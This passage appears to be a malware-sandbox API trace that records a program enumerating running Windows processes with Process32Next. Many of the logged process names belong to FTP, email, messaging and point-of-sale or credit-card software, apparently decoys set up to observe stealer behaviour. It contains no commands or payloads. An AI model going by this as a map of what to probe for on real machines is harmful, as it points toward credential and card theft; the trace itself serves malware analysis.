th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0191.143] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.144] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0191.146] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0191.148] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0191.195] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0191.197] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0191.199] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0191.201] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.202] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0191.204] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0191.205] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0191.207] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0191.209] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.211] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0191.212] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0191.214] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0191.216] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0191.217] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0191.219] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0191.221] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0191.223] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0191.224] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0191.226] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0191.227] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0191.229] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0191.231] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0191.286] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0191.288] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0191.289] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0191.291] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0191.292] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0191.294] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0191.296] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0191.298] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0191.299] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0191.302] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0191.304] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0191.306] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0191.308] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0191.310] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0191.312] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0191.314] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0191.316] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0191.318] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0191.373] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0191.375] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0191.377] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0191.379] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0191.382] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0191.384] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0191.386] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0191.389] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0191.392] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0191.395] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0191.398] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0191.401] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0191.404] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0191.407] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0191.457] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0191.459] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0191.460] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0191.462] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0191.465] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0191.467] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0191.468] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0191.470] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0191.472] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0191.475] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0191.478] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0191.481] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0191.483] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0191.486] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0191.489] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0191.535] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0191.538] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0191.540] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0191.542] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0191.544] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0191.545] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0191.547] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0191.549] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0191.550] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, 